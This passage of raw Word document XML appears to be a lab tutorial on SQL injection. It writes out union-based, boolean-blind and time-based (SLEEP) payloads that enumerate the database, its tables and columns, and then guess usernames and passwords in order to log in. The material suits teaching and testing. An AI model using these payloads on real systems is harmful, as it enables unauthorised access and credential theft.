          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Getting error in SQLi is the first step towards breaking the database. </w:t>
      </w:r>
      <w:r w:rsidR="006765E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The attacker should aim for getting error before trying to exploit. This error tells us that the second database has different columns than we entered. Therefore, let us try adding one column:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B1DE5B" w14:textId="6B0A5286" w:rsidR="006765E0" w:rsidRDefault="006765E0" w:rsidP="0068665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5A56F2" wp14:editId="6413EA24">
            <wp:extent cx="5725160" cy="19399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63FF95F6" w14:textId="72F50B87" w:rsidR="0068665A" w:rsidRDefault="006765E0" w:rsidP="00D7708B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>We still get the same error. Let us add one more column:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC81F92" w14:textId="67460150"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3C05F9" wp14:editId="2396B261">
            <wp:extent cx="5725160" cy="22504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FE38B8A" w14:textId="77777777" w:rsidR="006765E0" w:rsidRDefault="006765E0" w:rsidP="00D7708B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DA1F36D" w14:textId="3A5208D2" w:rsidR="0068665A" w:rsidRDefault="006765E0" w:rsidP="00D7708B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>It worked. The second table has 3 columns. Let us now get the name of the database:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CA0A04" w14:textId="0425DB5E" w:rsidR="006765E0" w:rsidRDefault="006765E0" w:rsidP="00D7708B">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0DED33" wp14:editId="77FEC704">
            <wp:extent cx="5725160" cy="23215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p>
    <w:p w14:paraId="09DC0866" w14:textId="79EDFA74" w:rsidR="0068665A" w:rsidRDefault="006765E0" w:rsidP="00D7708B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>We replaced a column with “</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>database(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">)” to get the name of the databas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you can notice that we changed the id value from 1 to 0, this is because we do not care about the return of the first part of the query</w:t>
      </w:r>
      <w:r w:rsidR="00EA41A4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, we care about the return of the UNUION SELECT statement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AE2A61" w14:textId="699C96FD" w:rsidR="00EA41A4" w:rsidRDefault="00EA41A4" w:rsidP="00D7708B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37595A40" w14:textId="09B4C193" w:rsidR="00EA41A4" w:rsidRDefault="00EA41A4" w:rsidP="00D7708B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we can ask for all the tables in that database. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7672CA17" w14:textId="77777777" w:rsidR="00EA41A4" w:rsidRDefault="00EA41A4" w:rsidP="00D7708B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68FAF811" w14:textId="58CE9EF3"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4EB30" wp14:editId="2A59F9BD">
            <wp:extent cx="5725160" cy="1160780"/>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14:paraId="3F8C06CF" w14:textId="303E956B" w:rsidR="00EA41A4" w:rsidRDefault="00EA41A4" w:rsidP="00D7708B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>And it returns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF70475" w14:textId="50CA11A0" w:rsidR="00EA41A4" w:rsidRDefault="00EA41A4" w:rsidP="00D7708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87D9D8" wp14:editId="3E9AB978">
            <wp:extent cx="5725160" cy="214693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452432A5" w14:textId="3743CDDE" w:rsidR="0068665A" w:rsidRDefault="00EA41A4" w:rsidP="00D7708B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This tells us that we have 2 tables: article and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>staff_users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E06B08">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and we can access them using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E06B08">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>group_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E06B08">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E06B08">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E06B08">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3D9610" w14:textId="55AD28C3" w:rsidR="00E06B08" w:rsidRDefault="00E06B08" w:rsidP="00D7708B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F01AF82" w14:textId="2EB6F2EE" w:rsidR="00860960" w:rsidRDefault="00860960" w:rsidP="00D7708B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15497956" w14:textId="6EB355F4" w:rsidR="00860960" w:rsidRDefault="00860960" w:rsidP="003574AF">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">admin123' UNION SELECT 1,2,3 where </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
        <w:t>database(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
        <w:t>) like 'D%';--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF33CAF" w14:textId="3E14381A" w:rsidR="00860960" w:rsidRDefault="00860960" w:rsidP="00860960">
      <w:r>
        <w:t>This query helps us to guess the database name. We keep entering values in the LIKE statement, as long as we get true as a respond, that means that the input letter/number is true. We keep guessing every letter until we get the whole name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B91B55" w14:textId="1A30604B" w:rsidR="00860960" w:rsidRDefault="00860960" w:rsidP="00860960">
      <w:r>
        <w:t>What is step 2?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEAE1A8" w14:textId="5B4FAF5A"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tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 'DATABASE_NAME' and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
        <w:t xml:space="preserve"> like 'u%';--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103D5E54" w14:textId="4ECB7788" w:rsidR="00860960" w:rsidRDefault="00860960" w:rsidP="00860960">
      <w:r>
        <w:t xml:space="preserve">We repeat the same thing but for the table name this time. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB58AEC" w14:textId="21278A8F" w:rsidR="00860960" w:rsidRDefault="00860960" w:rsidP="00860960">
      <w:r>
        <w:t>Step 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FB4680" w14:textId="1B070197" w:rsidR="00860960" w:rsidRDefault="00860960"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1,2,3 FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
        <w:t>schema.COLUMNS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE TABLE_SCHEMA='DATABASE_NAME' and TABLE_NAME='users' and COLUMN_NAME like 'a%';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5A75CE" w14:textId="3F070FDA" w:rsidR="00860960" w:rsidRDefault="00860960" w:rsidP="00860960">
      <w:r>
        <w:t>We keep guessing the column name. After getting all the column names, we can retrieve the data inside that column using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEF26BA" w14:textId="4C172FDC"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admin123' UNION SELECT 1,2,3 from users where username like 'a%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3093D5ED" w14:textId="77777777"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EA417" w14:textId="5A0B556B"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r w:rsidRPr="003574AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">admin123' UNION SELECT 1,2,3 from users where </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="003574AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> like '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>123</w:t>
      </w:r>
      <w:r w:rsidRPr="003574AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD8C55B" w14:textId="3A182BF2" w:rsidR="003574AF" w:rsidRDefault="003574AF" w:rsidP="003574AF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C5AAE5E" w14:textId="1058886C" w:rsidR="003574AF" w:rsidRPr="003574AF" w:rsidRDefault="003574AF" w:rsidP="003574AF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CF7E468" w14:textId="540B2AE4" w:rsidR="00860960" w:rsidRDefault="003574AF" w:rsidP="00860960">
      <w:r>
        <w:t>OR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B794492" w14:textId="527CC558" w:rsidR="003574AF" w:rsidRDefault="003574AF" w:rsidP="00860960">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
        <w:t>admin123' UNION SELECT 1,2,3 from users where username='admin' and password like '123%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E026391" w14:textId="3557BE64" w:rsidR="003574AF" w:rsidRDefault="003574AF" w:rsidP="003574AF">
      <w:r>
        <w:t>With this technique, we can get to the username and the password then log in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547EC87D" w14:textId="77777777" w:rsidR="00860960" w:rsidRDefault="00860960" w:rsidP="00860960"/>
    <w:p w14:paraId="5C0F724B" w14:textId="4283847D" w:rsidR="0068665A" w:rsidRDefault="003574AF" w:rsidP="003574AF">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQLi - TIME BASED </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7E8235" w14:textId="0F9A76DE" w:rsidR="003574AF" w:rsidRDefault="003574AF" w:rsidP="003574AF"/>
    <w:p w14:paraId="33CEE722" w14:textId="026C0D19" w:rsidR="003574AF" w:rsidRDefault="0041017F" w:rsidP="003574AF">
      <w:r>
        <w:t xml:space="preserve">It has the same idea as the previous method. When the entered statement is true, the response should be delayed for some seconds. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063F3394" w14:textId="25AFA049" w:rsidR="0041017F" w:rsidRDefault="0041017F" w:rsidP="003574AF">
      <w:pPr>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admin123' UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
        <w:t>SLEEP(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
        <w:t>5),2;--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D250EEF" w14:textId="4F9F8537" w:rsidR="0041017F" w:rsidRDefault="0041017F" w:rsidP="0041017F">
      <w:r>
        <w:t>If the data</w:t>
      </w:r>
      <w:r w:rsidR="0033795E">
        <w:t xml:space="preserve">base has 2 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0033795E">
        <w:t>columns(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0033795E">
        <w:t>TRUE STATEMENT) the response should be delayed 5 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C66287" w14:textId="40B2993C" w:rsidR="0033795E" w:rsidRDefault="0033795E" w:rsidP="0041017F">
      <w:r>
        <w:t>Then we can proceed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68832DAA" w14:textId="4313E60B" w:rsidR="0033795E" w:rsidRDefault="0033795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r w:rsidRPr="0033795E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">=admin123' UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0033795E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>SLEEP(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0033795E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>5),2 where database() like 'u%';--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6D0BF6" w14:textId="0B70BFA7" w:rsidR="005303BE" w:rsidRDefault="005303BE" w:rsidP="0033795E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F7510B4" w14:textId="439DBFCE" w:rsidR="005303BE" w:rsidRPr="0033795E" w:rsidRDefault="005303BE" w:rsidP="0033795E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">(WE CAN USE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>BurpSuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> to save time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAD7C60" w14:textId="77777777" w:rsidR="0033795E" w:rsidRPr="003574AF" w:rsidRDefault="0033795E" w:rsidP="0041017F"/>
    <w:p w14:paraId="4442B221" w14:textId="4DB871EE" w:rsidR="0068665A" w:rsidRDefault="0068665A" w:rsidP="00D7708B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37F79E6A" w14:textId="31851204" w:rsidR="0068665A" w:rsidRDefault="0068665A" w:rsidP="00D7708B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5910DE32" w14:textId="77290D96" w:rsidR="0068665A" w:rsidRDefault="0068665A" w:rsidP="00D7708B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
